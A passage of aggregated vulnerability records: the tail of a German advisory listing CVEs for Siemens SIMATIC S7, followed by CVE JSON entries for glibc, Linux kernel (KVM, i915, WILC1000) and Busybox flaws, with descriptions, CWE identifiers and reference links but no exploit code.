Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-33574" }, { "cve": "CVE-2021-3326", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-3326" }, { "cve": "CVE-2021-28831", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-28831" }, { "cve": "CVE-2021-27645", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-27645" }, { "cve": "CVE-2021-20269", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2021-20269" }, { "cve": "CVE-2020-29562", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2020-29562" }, { "cve": "CVE-2020-27618", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2020-27618" }, { "cve": "CVE-2020-1752", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2020-1752" }, { "cve": "CVE-2020-10029", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2020-10029" }, { "cve": "CVE-2019-25013", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2019-25013" }, { "cve": "CVE-2018-13405", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2018-13405" }, { "cve": "CVE-2016-10228", "notes": [ { "category": "description", "text": "In Siemens SIMATIC S7 existieren mehrere Schwachstellen. Die Fehler bestehen unter anderem aufgrund von unzul\u00e4ssigen Einschr\u00e4nkungen, Puffer\u00fcberl\u00e4ufen, fehlenden Freigaben und use-after-free-Problemen. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, seine Privilegien zu erweitern und Daten zu manipulieren. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T000126", "T028071" ] }, "release_date": "2023-06-12T22:00:00Z", "title": "CVE-2016-10228" } ] }
cve-2021-3999
Vulnerability from cvelistv5
Published
2022-08-24 00:00
Modified
2024-08-03 17:16
Severity ?
EPSS score ?
Summary
A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T17:16:03.318Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/01/24/4" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2021-3999" }, { "tags": [ "x_transferred" ], "url": "https://security-tracker.debian.org/tracker/CVE-2021-3999" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20221104-0001/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "glibc", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in glibc v2.31 and above." } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-193", "description": "CWE-193 - Off-by-one Error", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-04T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://www.openwall.com/lists/oss-security/2022/01/24/4" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769" }, { "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637" }, { "url": "https://access.redhat.com/security/cve/CVE-2021-3999" }, { "url": "https://security-tracker.debian.org/tracker/CVE-2021-3999" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" }, { "url": "https://security.netapp.com/advisory/ntap-20221104-0001/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2021-3999", "datePublished": "2022-08-24T00:00:00", "dateReserved": "2021-11-22T00:00:00", "dateUpdated": "2024-08-03T17:16:03.318Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-1852
Vulnerability from cvelistv5
Published
2022-06-30 12:42
Modified
2024-08-03 00:17
Severity ?
EPSS score ?
Summary
A NULL pointer dereference flaw was found in the Linux kernel’s KVM module, which can lead to a denial of service in the x86_emulate_insn in arch/x86/kvm/emulate.c. This flaw occurs while executing an illegal instruction in guest in the Intel CPU.
References
▼ | URL | Tags |
---|---|---|
https://github.com/torvalds/linux/commit/fee060cd52d69c114b62d1a2948ea9648b5131f9 | x_refsource_MISC | |
https://bugzilla.redhat.com/show_bug.cgi?id=2089815 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:17:00.872Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/fee060cd52d69c114b62d1a2948ea9648b5131f9" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089815" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "kernel 5.19 rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "A NULL pointer dereference flaw was found in the Linux kernel\u2019s KVM module, which can lead to a denial of service in the x86_emulate_insn in arch/x86/kvm/emulate.c. This flaw occurs while executing an illegal instruction in guest in the Intel CPU." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-08-05T16:45:50", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/torvalds/linux/commit/fee060cd52d69c114b62d1a2948ea9648b5131f9" }, { "tags": [ "x_refsource_MISC" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089815" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "secalert@redhat.com", "ID": "CVE-2022-1852", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "kernel", "version": { "version_data": [ { "version_value": "kernel 5.19 rc1" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A NULL pointer dereference flaw was found in the Linux kernel\u2019s KVM module, which can lead to a denial of service in the x86_emulate_insn in arch/x86/kvm/emulate.c. This flaw occurs while executing an illegal instruction in guest in the Intel CPU." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-476" } ] } ] }, "references": { "reference_data": [ { "name": "https://github.com/torvalds/linux/commit/fee060cd52d69c114b62d1a2948ea9648b5131f9", "refsource": "MISC", "url": "https://github.com/torvalds/linux/commit/fee060cd52d69c114b62d1a2948ea9648b5131f9" }, { "name": "https://bugzilla.redhat.com/show_bug.cgi?id=2089815", "refsource": "MISC", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2089815" } ] } } } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-1852", "datePublished": "2022-06-30T12:42:20", "dateReserved": "2022-05-24T00:00:00", "dateUpdated": "2024-08-03T00:17:00.872Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-4139
Vulnerability from cvelistv5
Published
2023-01-27 00:00
Modified
2024-08-03 01:27
Severity ?
EPSS score ?
Summary
An incorrect TLB flush issue was found in the Linux kernel’s GPU i915 kernel driver, potentially leading to random memory corruption or data leaks. This flaw could allow a local user to crash the system or escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:27:54.550Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2147572" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/11/30/1" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230309-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "kernel 6.1-rc7" } ] } ], "descriptions": [ { "lang": "en", "value": "An incorrect TLB flush issue was found in the Linux kernel\u2019s GPU i915 kernel driver, potentially leading to random memory corruption or data leaks. This flaw could allow a local user to crash the system or escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-281", "description": "CWE-281", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-09T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2147572" }, { "url": "https://www.openwall.com/lists/oss-security/2022/11/30/1" }, { "url": "https://security.netapp.com/advisory/ntap-20230309-0004/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-4139", "datePublished": "2023-01-27T00:00:00", "dateReserved": "2022-11-25T00:00:00", "dateUpdated": "2024-08-03T01:27:54.550Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42381
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.442Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in Busybox\u0027s awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42381", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.442Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-47518
Vulnerability from cvelistv5
Published
2022-12-18 00:00
Modified
2024-08-03 14:55
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel before 6.0.11. Missing validation of the number of channels in drivers/net/wireless/microchip/wilc1000/cfg80211.c in the WILC1000 wireless driver can trigger a heap-based buffer overflow when copying the list of operating channels from Wi-Fi management frames.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T14:55:08.375Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/r/20221123153543.8568-5-philipturnbull%40github.com" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/0cdfa9e6f0915e3d243e2393bfa8a22e12d553b0" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230113-0007/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel before 6.0.11. Missing validation of the number of channels in drivers/net/wireless/microchip/wilc1000/cfg80211.c in the WILC1000 wireless driver can trigger a heap-based buffer overflow when copying the list of operating channels from Wi-Fi management frames." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-01-13T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/r/20221123153543.8568-5-philipturnbull%40github.com" }, { "url": "https://github.com/torvalds/linux/commit/0cdfa9e6f0915e3d243e2393bfa8a22e12d553b0" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230113-0007/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-47518", "datePublished": "2022-12-18T00:00:00", "dateReserved": "2022-12-18T00:00:00", "dateUpdated": "2024-08-03T14:55:08.375Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42380
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.349Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in Busybox\u0027s awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42380", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.349Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-47520
Vulnerability from cvelistv5
Published
2022-12-18 00:00
Modified
2024-08-03 14:55
Severity ?
EPSS score ?
Summary
An issue was discovered in the Linux kernel before 6.0.11. Missing offset validation in drivers/net/wireless/microchip/wilc1000/hif.c in the WILC1000 wireless driver can trigger an out-of-bounds read when parsing a Robust Security Network (RSN) information element from a Netlink packet.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T14:55:08.339Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/r/20221123153543.8568-2-philipturnbull%40github.com" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/cd21d99e595ec1d8721e1058dcdd4f1f7de1d793" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230113-0007/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Linux kernel before 6.0.11. Missing offset validation in drivers/net/wireless/microchip/wilc1000/hif.c in the WILC1000 wireless driver can trigger an out-of-bounds read when parsing a Robust Security Network (RSN) information element from a Netlink packet." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-01-13T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lore.kernel.org/r/20221123153543.8568-2-philipturnbull%40github.com" }, { "url": "https://github.com/torvalds/linux/commit/cd21d99e595ec1d8721e1058dcdd4f1f7de1d793" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230113-0007/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-47520", "datePublished": 